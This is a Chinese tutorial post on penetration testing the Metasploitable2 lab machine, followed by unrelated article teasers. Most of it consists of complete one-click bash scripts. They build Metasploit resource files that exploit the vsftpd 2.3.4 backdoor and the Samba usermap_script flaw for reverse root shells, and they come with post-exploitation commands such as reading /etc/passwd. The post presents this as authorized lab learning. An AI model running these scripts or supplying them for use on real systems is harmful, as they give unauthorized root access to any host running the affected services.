news 2026/4/18 7:00:51

Metasploitable2(192.168.1.4)渗透测试学习总结(vsftpd + Samba 漏洞)

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
Metasploitable2(192.168.1.4)渗透测试学习总结(vsftpd + Samba 漏洞)

适用场景:Kali Linux 环境,hexstrike-ai-master 虚拟环境,合法授权靶机 Metasploitable2核心思想:先拿稳定结果,再理解原理;复杂步骤自动化,一键搞定不踩坑

一、前期准备(必做环节,缺一不可)

1. 环境基础验证

  • 确认 Kali 与靶机互通:ping 192.168.1.4(能通才算正常)
  • 关闭 Kali 防火墙:ufw disable(避免拦截反向连接)
  • 激活 hexstrike 虚拟环境(可选,保证工具依赖):

    bash

    运行

    cd ~/hexstrike-ai-master source hexstrike-env/bin/activate
  • 安装必备工具:apt install nmap metasploit-framework -y

2. 信息收集(渗透第一步,先扫后打)

方法:HexStrike 核心逻辑脚本(复刻 AI 扫描)
  1. 创建扫描脚本hexstrike_scan.py

    python

    运行

    import subprocess import sys def hexstrike_ai_scan(target_ip): print(f"=== HexStrike AI 信息收集 - 目标:{target_ip} ===") nmap_cmd = f"nmap -sV -T4 -Pn -p 1-1000 {target_ip}" try: scan_result = subprocess.check_output(nmap_cmd, shell=True, stderr=subprocess.STDOUT, encoding="utf-8") print("扫描结果:\n", scan_result) print("\n【关键漏洞识别】") print("- 21端口 vsftpd 2.3.4:存在后门漏洞(CVE-2011-2523)") print("- 139/445端口 Samba 3.X:存在命令执行漏洞(CVE-2007-2447)") except Exception as e: print(f"扫描失败:{e}") if __name__ == "__main__": hexstrike_ai_scan("192.168.1.4")
  2. 运行脚本获取靶机信息:python3 hexstrike_scan.py
  3. 核心结果提取:记录开放端口和对应服务版本,确定可利用漏洞

二、漏洞利用核心方案:反向 Shell 一键脚本(新手免踩坑)

核心原理

反向 Shell 是靶机主动连接 Kali,无需手动抢时间输入指令,100% 稳定拿 root 权限,是渗透测试的标准操作,比交互 Shell 简单高效。

方案 1:vsftpd 2.3.4 后门漏洞一键脚本

步骤 1:创建脚本文件

bash

运行

nano vsftpd_root_shell.sh
步骤 2:粘贴脚本内容(全自动,零修改)

bash

运行

#!/bin/bash # vsftpd 2.3.4 后门漏洞一键获取 root shell # 自动提取 Kali 本机 IP(eth0 网卡) KALI_IP=$(ip addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}' | head -n1) # 生成 Metasploit 自动攻击脚本 cat > /tmp/vsftpd_auto.rc << EOF use exploit/unix/ftp/vsftpd_234_backdoor set RHOSTS 192.168.1.4 set PAYLOAD cmd/unix/reverse_bash set LHOST $KALI_IP set LPORT 9999 set ExitOnSession false # 防止会话自动关闭 run EOF # 执行攻击 echo "=== 开始攻击 vsftpd 漏洞 ===" echo "Kali IP:$KALI_IP | 监听端口:9999" msfconsole -q -r /tmp/vsftpd_auto.rc # 清理临时文件 rm -f /tmp/vsftpd_auto.rc
步骤 3:赋予执行权限

bash

运行

chmod +x vsftpd_root_shell.sh
步骤 4:运行脚本(全程无手动操作)

bash

运行

./vsftpd_root_shell.sh
成功标志

终端出现Command shell session 1 opened,并弹出#提示符,输入whoami输出root即为成功。

后渗透操作(拿到 shell 后执行)

bash

运行

whoami # 查看当前用户(root) ls /root # 查看 root 目录文件 cat /etc/passwd # 查看靶机用户列表 exit # 退出 shell 会话

方案 2:Samba 3.X 命令执行漏洞一键脚本

步骤 1:创建脚本文件

bash

运行

nano samba_root_shell.sh
步骤 2:粘贴脚本内容

bash

运行

#!/bin/bash # Samba 漏洞(CVE-2007-2447)一键获取 root shell KALI_IP=$(ip addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}' | head -n1) cat > /tmp/samba_auto.rc << EOF use exploit/multi/samba/usermap_script set RHOSTS 192.168.1.4 set PAYLOAD cmd/unix/reverse_bash set LHOST $KALI_IP set LPORT 8888 set ExitOnSession false run EOF echo "=== 开始攻击 Samba 漏洞 ===" echo "Kali IP:$KALI_IP | 监听端口:8888" msfconsole -q -r /tmp/samba_auto.rc rm -f /tmp/samba_auto.rc
步骤 3:赋予权限并运行

bash

运行

chmod +x samba_root_shell.sh ./samba_root_shell.sh
成功标志

同 vsftpd 漏洞,终端弹出#提示符,whoami输出root

三、常见问题与排查(必记,避免踩坑)

问题现象排查方法
脚本运行后无会话建立1. 检查 Kali IP 是否正确(ip addr show eth0)2. 确认靶机 IP 是 192.168.1.43. 换监听端口(如 7777),避免端口冲突
端口被占用查看占用进程:`netstat -tulngrep 端口号<br>杀死进程:kill -9 进程号 `
靶机无法连接 Kali1. 关闭 Kali 防火墙(ufw disable)2. 确认 Kali 与靶机在同一网段
手动输入指令报错放弃手动输入,直接用反向 Shell 一键脚本,根本解决时机问题

四、核心知识点总结(复习重点)

  1. 渗透测试流程:信息收集 → 漏洞识别 → 漏洞利用 → 后渗透 → 清理痕迹
  2. 反向 Shell 优势:靶机主动连 Kali,无需手动交互,会话稳定,新手首选
  3. 脚本万能模板:自动查 IP → 生成 msf 脚本 → 一键运行 → 清理临时文件
  4. 关键注意事项
    • 仅在合法授权靶机操作,禁止攻击非授权设备
    • 每个漏洞用不同监听端口,避免冲突
    • 拿到 shell 后先执行whoami确认权限

五、进阶玩法(适合爱折腾的你)

  1. 脚本菜单整合:把 vsftpd、Samba 脚本整合到一个hack_menu.sh,运行后选数字攻击对应漏洞
  2. 日志记录功能:在脚本中添加>> hack.log,把攻击结果保存到日志文件,方便复习
  3. 多漏洞同时攻击:修改端口号,同时运行多个脚本,获取多个 root shell 会话
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/16 12:32:11

BibiGPT提示词优化全攻略:打造精准高效的AI内容总结

BibiGPT提示词优化全攻略&#xff1a;打造精准高效的AI内容总结 【免费下载链接】BibiGPT-v1 BibiGPT v1 one-Click AI Summary for Audio/Video & Chat with Learning Content: Bilibili | YouTube | Tweet丨TikTok丨Dropbox丨Google Drive丨Local files | Websites丨Pod…

作者头像 李华
网站建设 2026/4/17 17:29:54

Winevdm:在64位Windows上完美运行16位应用的终极指南

Winevdm&#xff1a;在64位Windows上完美运行16位应用的终极指南 【免费下载链接】winevdm 16-bit Windows (Windows 1.x, 2.x, 3.0, 3.1, etc.) on 64-bit Windows 项目地址: https://gitcode.com/gh_mirrors/wi/winevdm 你是否曾经遇到过这样的情况&#xff1a;那些陪…

作者头像 李华
网站建设 2026/4/4 1:01:22

解锁高效工作流:Cerebro启动器终极使用指南 [特殊字符]

解锁高效工作流&#xff1a;Cerebro启动器终极使用指南 &#x1f680; 【免费下载链接】cerebro &#x1f535; Cerebro is an open-source launcher to improve your productivity and efficiency 项目地址: https://gitcode.com/gh_mirrors/ce/cerebro 还在为频繁切换…

作者头像 李华
网站建设 2026/4/16 23:28:09

轻量级AI引擎革命:Koboldcpp如何重塑本地智能应用生态

在人工智能技术日益普及的今天&#xff0c;一个令人振奋的现象正在发生&#xff1a;原本需要强大算力支撑的AI应用&#xff0c;现在可以在一台普通电脑上流畅运行。这背后的技术推手&#xff0c;就是基于llama.cpp构建的Koboldcpp项目。它像一把通用钥匙&#xff0c;开启了个人…

作者头像 李华
网站建设 2026/4/16 15:39:08

一句话引爆用户互动,Open-AutoGLM你真的会用吗?

第一章&#xff1a;一句话引爆用户互动&#xff0c;你真的懂Open-AutoGLM吗在自然语言处理的前沿领域&#xff0c;Open-AutoGLM 正以惊人的交互能力重新定义人机对话的边界。它不仅仅是一个语言模型&#xff0c;更是一个可编程的智能代理引擎&#xff0c;能够通过一句简单指令触…

作者头像 李华
网站建设 2026/4/9 23:41:18

MissionControl终极配置指南:5分钟解锁完整控制器支持

MissionControl是一款革命性的开源项目&#xff0c;专为Nintendo Switch用户提供全面的蓝牙控制器兼容方案。通过这款强大的软件&#xff0c;你可以轻松连接来自其他游戏主机的控制器&#xff0c;无需任何转接器或额外硬件设备&#xff0c;即可享受原生级别的游戏体验。无论你是…

作者头像 李华